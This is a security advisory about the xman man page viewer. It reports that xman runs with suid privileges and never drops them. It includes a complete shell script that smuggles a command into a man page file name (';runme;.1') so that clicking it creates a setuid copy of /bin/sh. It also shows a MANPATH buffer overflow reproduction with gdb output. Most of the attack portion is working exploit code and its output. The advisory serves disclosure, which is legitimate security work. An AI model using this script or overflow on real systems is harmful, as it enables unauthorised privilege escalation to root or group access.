COMMAND

    xman

SYSTEMS AFFECTED

    xman

PROBLEM

    'Vde79' found following.   xman doesn't drop privileges  anywheres
    in  the  program,  but   does  support  suid  installation.    So,
    exploiting  via  a  system  call  is  much  easier than the buffer
    overflow in MANPATH, mentioned  in some earlier advisories.   Here
    is an example of such an exploitation possibility:

    #!/bin/sh
    # example of xman exploitation. xman
    # supports privileges.  but, never
    # drops them.
    # Vade79 -> v9@realhalo.org -> realhalo.org.
    MANPATH=~/xmantest/
    mkdir -p ~/xmantest/man1
    cd ~/xmantest/man1
    touch ';runme;.1'
    cat << EOF >~/xmantest/runme
    #!/bin/sh
    cp /bin/sh ~/xmansh
    chown `id -u` ~/xmansh
    chmod 4755 ~/xmansh
    EOF
    chmod 755 ~/xmantest/runme
    echo "click the ';runme;' selection," \
    "exit.  then, check for ~/xmansh."
    xman -bothshown -notopbox
    rm -rf ~/xmantest
 
    'KF'added     following.         xman      from      at      least
     X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic overflow.

    [root@linux lib]# ls -al `which xman`
    -rwxr-sr-x    1 root     man         41076 Jun 17  1998
    /usr/X11R6/bin/xman*
    
    [root@linux lib]# xman
    [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
    [root@linux lib]# xman
    Xman Error: Could not allocate memory for manual sections.
    
    [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
    [root@linux lib]# xman
    Segmentation fault
    
    [root@linux lib]# gdb xman
    GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
    (gdb) run
    Starting program: /usr/X11R6/bin/xman
    0x4022fb66 in getenv () from /lib/libc.so.6
    (gdb) bt
    #0  0x4022fb66 in getenv () from /lib/libc.so.6
    #1  0x0804bc47 in _start ()
    #2  0x41414141 in ?? ()
    Cannot access memory at address 0x41414141
    
    (gdb) info registers
    eax            0xbffee784       -1073813628
    ecx            0x804fb29        134544169
    edx            0x805414c        134562124
    ebx            0x40328f2c       1077055276
    esp            0xbffec6fc       0xbffec6fc
    ebp            0xbffec714       0xbffec714
    esi            0x6      6
    edi            0x41414141       1094795585
    eip            0x4022fb66       0x4022fb66

SOLUTION

    Nothing yet.